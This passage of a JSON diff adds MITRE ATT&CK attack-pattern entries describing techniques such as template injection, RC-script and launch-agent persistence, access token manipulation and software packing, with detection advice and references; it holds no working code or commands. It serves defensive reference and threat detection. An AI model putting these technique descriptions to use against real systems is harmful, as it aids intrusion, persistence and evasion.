"x_mitre_defense_bypassed": [ + "Static File Analysis" + ], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--dc31fe1e-d722-49da-8f5f-92c7b5aff534", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1221", + "external_id": "T1221" + }, + { + "source_name": "Microsoft Open XML July 2017", + "description": "Microsoft. (2014, July 9). Introducing the Office (2007) Open XML File Formats. Retrieved July 20, 2018.", + "url": "https://docs.microsoft.com/previous-versions/office/developer/office-2007/aa338205(v=office.12)" + }, + { + "source_name": "SANS Brian Wiltse Template Injection", + "description": "Wiltse, B.. (2018, November 7). Template Injection Attacks - Bypassing Security Controls by Living off the Land. Retrieved April 10, 2019.", + "url": "https://www.sans.org/reading-room/whitepapers/testing/template-injection-attacks-bypassing-security-controls-living-land-38780" + }, + { + "source_name": "Redxorblue Remote Template Injection", + "description": "Hawkins, J. (2018, July 18). Executing Macros From a DOCX With Remote Template Injection. Retrieved October 12, 2018.", + "url": "http://blog.redxorblue.com/2018/07/executing-macros-from-docx-with-remote.html" + }, + { + "source_name": "MalwareBytes Template Injection OCT 2017", + "description": "Segura, J. (2017, October 13). Decoy Microsoft Word document delivers malware through a RAT. Retrieved July 21, 2018.", + "url": "https://blog.malwarebytes.com/threat-analysis/2017/10/decoy-microsoft-word-document-delivers-malware-through-rat/" + }, + { + "source_name": "Proofpoint RTF Injection", + "description": "Raggi, M. (2021, December 1). Injection is the New Black: Novel RTF Template Inject Technique Poised for Widespread Adoption Beyond APT Actors . Retrieved December 9, 2021.", + "url": "https://www.proofpoint.com/us/blog/threat-insight/injection-new-black-novel-rtf-template-inject-technique-poised-widespread" + }, + { + "source_name": "Ciberseguridad Decoding malicious RTF files", + "description": "Pedrero, R.. (2021, July). Decoding malicious RTF files. Retrieved November 16, 2021.", + "url": "https://ciberseguridad.blog/decodificando-ficheros-rtf-maliciosos/" + }, + { + "source_name": "Anomali Template Injection MAR 2018", + "description": "Intel_Acquisition_Team. (2018, March 1). Credential Harvesting and Malicious File Delivery using Microsoft Office Template Injection. Retrieved July 20, 2018.", + "url": "https://forum.anomali.com/t/credential-harvesting-and-malicious-file-delivery-using-microsoft-office-template-injection/2104" + }, + { + "source_name": "Talos Template Injection July 2017", + "description": "Baird, S. et al.. (2017, July 7). Attack on Critical Infrastructure Leverages Template Injection. Retrieved July 21, 2018.", + "url": "https://blog.talosintelligence.com/2017/07/template-injection.html" + }, + { + "source_name": "ryhanson phishery SEPT 2016", + "description": "Hanson, R. (2016, September 24). phishery. Retrieved July 21, 2018.", + "url": "https://github.com/ryhanson/phishery" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-04-16T12:22:29.150Z", + "name": "RC Scripts", + "description": "Adversaries may establish persistence by modifying RC scripts which are executed during a Unix-like system’s startup. These files allow system administrators to map and start custom services at startup for different run levels. RC scripts require root privileges to modify.\n\nAdversaries can establish persistence by adding a malicious binary path or shell commands to rc.local, rc.common, and other RC scripts specific to the Unix-like distribution.(Citation: IranThreats Kittens Dec 2017)(Citation: Intezer HiddenWasp Map 2019) Upon reboot, the system executes the script's contents as root, resulting in persistence.\n\nAdversary abuse of RC scripts is especially effective for lightweight Unix-like distributions using the root user as default, such as IoT or embedded systems.(Citation: intezer-kaiji-malware)\n\nSeveral Unix-like systems have moved to Systemd and deprecated the use of RC scripts. This is now a deprecated mechanism in macOS in favor of [Launchd](https://attack.mitre.org/techniques/T1053/004). (Citation: Apple Developer Doco Archive Launchd)(Citation: Startup Items) This technique can be used on Mac OS X Panther v10.3 and earlier versions which still execute the RC scripts.(Citation: Methods of Mac Malware Persistence) To maintain backwards compatibility some systems, such as Ubuntu, will execute the RC scripts if they exist with the correct file permissions.(Citation: Ubuntu Manpage systemd rc)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor for unexpected changes to RC scripts in the /etc/ directory. Monitor process execution resulting from RC scripts for unusual or unknown applications or behavior.\n\nMonitor for /etc/rc.local file creation. Although types of RC scripts vary for each Unix-like distribution, several execute /etc/rc.local if present. ", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "macOS", + "Linux", + "Network" + ], + "x_mitre_version": "2.1", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "root" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--dca670cf-eeec-438f-8185-fd959d9ef211", + "created": "2020-01-15T16:25:22.260Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1037/004", + "external_id": "T1037.004" + }, + { + "source_name": "Apple Developer Doco Archive Launchd", + "description": "Apple. (2016, September 13). Daemons and Services Programming Guide - Creating Launch Daemons and Agents. Retrieved February 24, 2021.", + "url": "https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html" + }, + { + "source_name": "Startup Items", + "description": "Apple. (2016, September 13). Startup Items. Retrieved July 11, 2017.", + "url": "https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html" + }, + { + "source_name": "Ubuntu Manpage systemd rc", + "description": "Canonical Ltd.. (n.d.). systemd-rc-local-generator - Compatibility generator for starting /etc/rc.local and /usr/sbin/halt.local during boot and shutdown. Retrieved February 23, 2021.", + "url": "http://manpages.ubuntu.com/manpages/bionic/man8/systemd-rc-local-generator.8.html" + }, + { + "source_name": "IranThreats Kittens Dec 2017", + "description": "Iran Threats . (2017, December 5). Flying Kitten to Rocket Kitten, A Case of Ambiguity and Shared Code. Retrieved May 28, 2020.", + "url": "https://iranthreats.github.io/resources/attribution-flying-rocket-kitten/" + }, + { + "source_name": "Methods of Mac Malware Persistence", + "description": "Patrick Wardle. (2014, September). Methods of Malware Persistence on Mac OS X. Retrieved July 5, 2017.", + "url": "https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf" + }, + { + "source_name": "intezer-kaiji-malware", + "description": "Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware turning to Golang. Retrieved December 17, 2020.", + "url": "https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/" + }, + { + "source_name": "Intezer HiddenWasp Map 2019", + "description": "Sanmillan, I. (2019, May 29). HiddenWasp Malware Stings Targeted Linux Systems. Retrieved June 24, 2019.", + "url": "https://www.intezer.com/blog-hiddenwasp-malware-targeting-linux-systems/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-09T14:00:00.188Z", + "name": "Access Token Manipulation", + "description": "Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.\n\nAn adversary can use built-in Windows API functions to copy access tokens from existing processes; this is known as token stealing. These token can then be applied to an existing process (i.e. [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001)) or used to spawn a new process (i.e. [Create Process with Token](https://attack.mitre.org/techniques/T1134/002)). An adversary must already be in a privileged user context (i.e. administrator) to steal a token. However, adversaries commonly use token stealing to elevate their security context from the administrator level to the SYSTEM level. An adversary can then use a token to authenticate to a remote system as the account for that token if the account has appropriate permissions on the remote system.(Citation: Pentestlab Token Manipulation)\n\nAny standard user can use the runas command, and the Windows API functions, to create impersonation tokens; it does not require access to an administrator account. There are also other mechanisms, such as Active Directory fields, that can be used to modify access tokens.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Tom Ueltschi @c_APT_ure", + "Travis Smith, Tripwire", + "Robby Winchester, @robwinchester3", + "Jared Atkinson, @jaredcatkinson" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "If an adversary is using a standard command-line shell, analysts can detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the runas command. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging)\n\nIf an adversary is using a payload that calls the Windows token APIs directly, analysts can detect token manipulation only through careful analysis of user network activity, examination of running processes, and correlation with other endpoint and network behavior. \n\nThere are many Windows API calls a payload can take advantage of to manipulate access tokens (e.g., LogonUser (Citation: Microsoft LogonUser), DuplicateTokenEx(Citation: Microsoft DuplicateTokenEx), and ImpersonateLoggedOnUser(Citation: Microsoft ImpersonateLoggedOnUser)). Please see the referenced Windows API pages for more information.\n\nQuery systems for process and thread token information and look for inconsistencies such as user owns processes impersonating the local SYSTEM account.(Citation: BlackHat Atkinson Winchester Token Manipulation)\n\nLook for inconsistencies between the various fields that store PPID information, such as the EventHeader ProcessId from data collected via Event Tracing for Windows (ETW), Creator Process ID/Name from Windows event logs, and the ProcessID and ParentProcessID (which are also produced from ETW and other utilities such as Task Manager and Process Explorer). The ETW provided EventHeader ProcessId identifies the actual parent process.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "2.0", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Windows User Account Control", + "Heuristic Detection", + "System Access Controls", + "Host Forensic Analysis" + ], + "x_mitre_effective_permissions": [ + "SYSTEM" + ], + "x_mitre_permissions_required": [ + "User", + "Administrator" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--dcaa092b-7de9-4a21-977f-7fcb77e89c48", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1134", + "external_id": "T1134" + }, + { + "source_name": "BlackHat Atkinson Winchester Token Manipulation", + "description": "Atkinson, J., Winchester, R. (2017, December 7). A Process is No One: Hunting for Token Manipulation. Retrieved December 21, 2017.", + "url": "https://www.blackhat.com/docs/eu-17/materials/eu-17-Atkinson-A-Process-Is-No-One-Hunting-For-Token-Manipulation.pdf" + }, + { + "source_name": "Microsoft Command-line Logging", + "description": "Mathers, B. (2017, March 7). Command line process auditing. Retrieved April 21, 2017.", + "url": "https://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/manage/component-updates/command-line-process-auditing" + }, + { + "source_name": "Microsoft LogonUser", + "description": "Microsoft TechNet. (n.d.). Retrieved April 25, 2017.", + "url": "https://msdn.microsoft.com/en-us/library/windows/desktop/aa378184(v=vs.85).aspx" + }, + { + "source_name": "Microsoft DuplicateTokenEx", + "description": "Microsoft TechNet. (n.d.). Retrieved April 25, 2017.", + "url": "https://msdn.microsoft.com/en-us/library/windows/desktop/aa446617(v=vs.85).aspx" + }, + { + "source_name": "Microsoft ImpersonateLoggedOnUser", + "description": "Microsoft TechNet. (n.d.). Retrieved April 25, 2017.", + "url": "https://msdn.microsoft.com/en-us/library/windows/desktop/aa378612(v=vs.85).aspx" + }, + { + "source_name": "Pentestlab Token Manipulation", + "description": "netbiosX. (2017, April 3). Token Manipulation. Retrieved April 21, 2017.", + "url": "https://pentestlab.blog/2017/04/03/token-manipulation/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Time Providers", + "description": "The Windows Time service (W32Time) enables time synchronization across and within domains. (Citation: Microsoft W32Time Feb 2018) W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients. (Citation: Microsoft TimeProvider)\n\nTime providers are implemented as dynamic-link libraries (DLLs) that are registered in the subkeys of HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\W32Time\\TimeProviders\\. (Citation: Microsoft TimeProvider) The time provider manager, directed by the service control manager, loads and starts time providers listed and enabled under this key at system startup and/or whenever parameters are changed. (Citation: Microsoft TimeProvider)\n\nAdversaries may abuse this architecture to establish Persistence, specifically by registering and enabling a malicious DLL as a time provider. Administrator privileges are required for time provider registration, though execution will run in context of the Local Service account. (Citation: Github W32Time Oct 2017)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Scott Lundgren, @5twenty9, Carbon Black" + ], + "x_mitre_detection": "Baseline values and monitor/analyze activity related to modifying W32Time information in the Registry, including application programming interface (API) calls such as RegCreateKeyEx and RegSetValueEx as well as execution of the W32tm.exe utility. (Citation: Microsoft W32Time May 2017) There is no restriction on the number of custom time providers registrations, though each may require a DLL payload written to disk. (Citation: Github W32Time Oct 2017)\n\nThe Sysinternals Autoruns tool may also be used to analyze auto-starting locations, including DLLs listed as time providers. (Citation: TechNet Autoruns)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "Administrator", + "SYSTEM" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--dce31a00-1e90-4655-b0f9-e2e71a748a87", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1209", + "external_id": "T1209" + }, + { + "source_name": "Microsoft W32Time Feb 2018", + "description": "Microsoft. (2018, February 1). Windows Time Service (W32Time). Retrieved March 26, 2018.", + "url": "https://docs.microsoft.com/windows-server/networking/windows-time-service/windows-time-service-top" + }, + { + "source_name": "Microsoft TimeProvider", + "description": "Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018.", + "url": "https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx" + }, + { + "source_name": "Github W32Time Oct 2017", + "description": "Lundgren, S. (2017, October 28). w32time. Retrieved March 26, 2018.", + "url": "https://github.com/scottlundgren/w32time" + }, + { + "source_name": "Microsoft W32Time May 2017", + "description": "Mathers, B. (2017, May 31). Windows Time Service Tools and Settings. Retrieved March 26, 2018.", + "url": "https://docs.microsoft.com/windows-server/networking/windows-time-service/windows-time-service-tools-and-settings" + }, + { + "source_name": "TechNet Autoruns", + "description": "Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.", + "url": "https://technet.microsoft.com/en-us/sysinternals/bb963902" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-09T14:00:00.188Z", + "name": "Multi-Factor Authentication Interception", + "description": "Adversaries may target multi-factor authentication (MFA) mechanisms, (i.e., smart cards, token generators, etc.) to gain access to credentials that can be used to access systems, services, and network resources. Use of MFA is recommended and provides a higher level of security than usernames and passwords alone, but organizations should be aware of techniques that could be used to intercept and bypass these security mechanisms. \n\nIf a smart card is used for multi-factor authentication, then a keylogger will need to be used to obtain the password associated with a smart card during normal use. With both an inserted card and access to the smart card password, an adversary can connect to a network resource using the infected system to proxy the authentication with the inserted hardware token. (Citation: Mandiant M Trends 2011)\n\nAdversaries may also employ a keylogger to similarly target other hardware tokens, such as RSA SecurID. Capturing token input (including a user's personal identification code) may provide temporary access (i.e. replay the one-time passcode until the next value rollover) as well as possibly enabling adversaries to reliably predict future authentication values (given access to both the algorithm and any seed values used to generate appended temporary codes). (Citation: GCN RSA June 2011)\n\nOther methods of MFA may be intercepted and used by an adversary to authenticate. It is common for one-time codes to be sent via out-of-band communications (email, SMS). If the device and/or service is not secured, then it may be vulnerable to interception. Service providers can also be targeted: for example, an adversary may compromise an SMS messaging service in order to steal MFA codes sent to users’ phones.(Citation: Okta Scatter Swine 2022)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "John Lambert, Microsoft Threat Intelligence Center" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Detecting use of proxied smart card connections by an adversary may be difficult because it requires the token to be inserted into a system; thus it is more likely to be in use by a legitimate user and blend in with other network behavior.\n\nSimilar to [Input Capture](https://attack.mitre.org/techniques/T1056), keylogging activity can take various forms but can may be detected via installation of a driver, setting a hook, or usage of particular API calls associated with polling to intercept keystrokes.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_version": "2.1", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--dd43c543-bb85-4a6f-aa6e-160d90d06a49", + "created": "2017-05-31T21:31:23.195Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1111", + "external_id": "T1111" + }, + { + "source_name": "GCN RSA June 2011", + "description": "Jackson, William. (2011, June 7). RSA confirms its tokens used in Lockheed hack. Retrieved September 24, 2018.", + "url": "https://gcn.com/cybersecurity/2011/06/rsa-confirms-its-tokens-used-in-lockheed-hack/282818/" + }, + { + "source_name": "Mandiant M Trends 2011", + "description": "Mandiant. (2011, January 27). Mandiant M-Trends 2011. Retrieved January 10, 2016.", + "url": "https://dl.mandiant.com/EE/assets/PDF_MTrends_2011.pdf" + }, + { + "source_name": "Okta Scatter Swine 2022", + "description": "Okta. (2022, August 25). Detecting Scatter Swine: Insights into a Relentless Phishing Campaign. Retrieved February 24, 2023.", + "url": "https://sec.okta.com/scatterswine" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Launch Agent", + "description": "Per Apple’s developer documentation, when a user logs in, a per-user launchd process is started which loads the parameters for each launch-on-demand user agent from the property list (plist) files found in /System/Library/LaunchAgents, /Library/LaunchAgents, and $HOME/Library/LaunchAgents (Citation: AppleDocs Launch Agent Daemons) (Citation: OSX Keydnap malware) (Citation: Antiquated Mac Malware). These launch agents have property list files which point to the executables that will be launched (Citation: OSX.Dok Malware).\n \nAdversaries may install a new launch agent that can be configured to execute at login by using launchd or launchctl to load a plist into the appropriate directories (Citation: Sofacy Komplex Trojan) (Citation: Methods of Mac Malware Persistence). The agent name may be disguised by using a name from a related operating system or benign software. Launch Agents are created with user level privileges and are executed with the privileges of the user when they log in (Citation: OSX Malware Detection) (Citation: OceanLotus for OS X). They can be set up to execute when a specific user logs in (in the specific user’s directory structure) or when any user logs in (which requires administrator privileges).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Monitor Launch Agent creation through additional plist files and utilities such as Objective-See’s KnockKnock application. Launch Agents also require files on disk for persistence which can also be monitored via other file monitoring applications.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "macOS" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User", + "Administrator" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--dd901512-6e37-4155-943b-453e3777b125", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1159", + "external_id": "T1159" + }, + { + "source_name": "AppleDocs Launch Agent Daemons", + "description": "Apple. (n.d.). Creating Launch Daemons and Agents. Retrieved July 10, 2017.", + "url": "https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html" + }, + { + "source_name": "OSX Keydnap malware", + "description": "Marc-Etienne M.Leveille. (2016, July 6). New OSX/Keydnap malware is hungry for credentials. Retrieved July 3, 2017.", + "url": "https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/" + }, + { + "source_name": "Antiquated Mac Malware", + "description": "Thomas Reed. (2017, January 18). New Mac backdoor using antiquated code. Retrieved July 5, 2017.", + "url": "https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/" + }, + { + "source_name": "OSX.Dok Malware", + "description": "Thomas Reed. (2017, July 7). New OSX.Dok malware intercepts web traffic. Retrieved July 10, 2017.", + "url": "https://blog.malwarebytes.com/threat-analysis/2017/04/new-osx-dok-malware-intercepts-web-traffic/" + }, + { + "source_name": "Sofacy Komplex Trojan", + "description": "Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26). Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.", + "url": "https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/" + }, + { + "source_name": "Methods of Mac Malware Persistence", + "description": "Patrick Wardle. (2014, September). Methods of Malware Persistence on Mac OS X. Retrieved July 5, 2017.", + "url": "https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf" + }, + { + "source_name": "OSX Malware Detection", + "description": "Patrick Wardle. (2016, February 29). Let's Play Doctor: Practical OS X Malware Detection & Analysis. Retrieved July 10, 2017.", + "url": "https://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdf" + }, + { + "source_name": "OceanLotus for OS X", + "description": "Eddie Lee. (2016, February 17). OceanLotus for OS X - an Application Bundle Pretending to be an Adobe Flash Update. Retrieved July 5, 2017.", + "url": "https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T21:01:48.113Z", + "name": "Software Packing", + "description": "Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.(Citation: ESET FinFisher Jan 2018) \n\nUtilities used to perform software packing are called packers. Example packers are MPRESS and UPX. A more comprehensive list of known packers is available, but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses.(Citation: Awesome Executable Packing) ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Filip Kafka, ESET" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Use file scanning to look for known software packers or artifacts of packing techniques. Packing is not a definitive indicator of malicious activity, because legitimate software may use packing techniques to reduce binary size or to protect proprietary code.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "macOS", + "Windows", + "Linux" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Anti-virus", + "Heuristic detection", + "Signature-based detection" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--deb98323-e13f-4b0c-8d94-175379069062", + "created": "2020-02-05T14:17:46.686Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1027/002", + "external_id": "T1027.002" + }, + { + "source_name": "Awesome Executable Packing", + "description": "Alexandre D'Hondt. (n.d.). Awesome Executable Packing. Retrieved March 11, 2022.", + "url": "https://github.com/dhondta/awesome-executable-packing" + }, + { + "source_name": "ESET FinFisher Jan 2018", + "description": "Kafka, F. (2018, January). ESET's Guide to Deobfuscating and Devirtualizing FinFisher. Retrieved August 12, 2019.", + "url": "https://www.welivesecurity.com/wp-content/uploads/2018/01/WP-FinFisher.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-10-20T21:19:57.555Z", + "name": "Serverless", + "description": "Adversaries may compromise serverless cloud infrastructure, such as Cloudflare Workers or AWS Lambda functions, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them. \n\nOnce compromised, the serverless runtime environment can be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090) traffic to an adversary-owned command and control server.(Citation: BlackWater Malware Cloudflare Workers)(Citation: AWS Lambda Redirector) As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers.(Citation: Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare Workers)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Awake Security" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--df1bc34d-1634-4c93-b89e-8120994fce77", + "created": "2022-07-08T12:46:15.450Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1584/007", + "external_id": "T1584.007" + }, + { + "source_name": "AWS Lambda Redirector", + "description": "Adam Chester. (2020, February 25). AWS Lambda Redirector. Retrieved July 8, 2022.", + "url": "https://blog.xpnsec.com/aws-lambda-redirector/" + }, + { + "source_name": "Detecting Command & Control in the Cloud", + "description": "Gary Golomb. (n.d.). Threat Hunting Series: Detecting Command & Control in the Cloud. Retrieved July 8, 2022.", + "url": "https://awakesecurity.com/blog/threat-hunting-series-detecting-command-control-in-the-cloud/" + }, + { + "source_name": "BlackWater Malware Cloudflare Workers", + "description": "Lawrence Abrams. (2020, March 14). BlackWater Malware Abuses Cloudflare Workers for C2 Communication. Retrieved July 8, 2022.", + "url": "https://www.bleepingcomputer.com/news/security/blackwater-malware-abuses-cloudflare-workers-for-c2-communication/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-04-16T12:28:21.234Z", + "name": "Web Protocols", + "description": "Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nProtocols such as HTTP/S(Citation: CrowdStrike Putter Panda) and WebSocket(Citation: Brazking-Websockets) that carry web traffic may be very common in environments. HTTP/S packets have many fields and headers in which data can be concealed. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "TruKno" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards regarding syntax, structure, or any other variable adversaries could leverage to conceal data.(Citation: University of Birmingham C2)\n\nMonitor for web traffic to/from known-bad or suspicious domains. ", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "Network" + ], + "x_mitre_version": "1.3", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161", + "created": 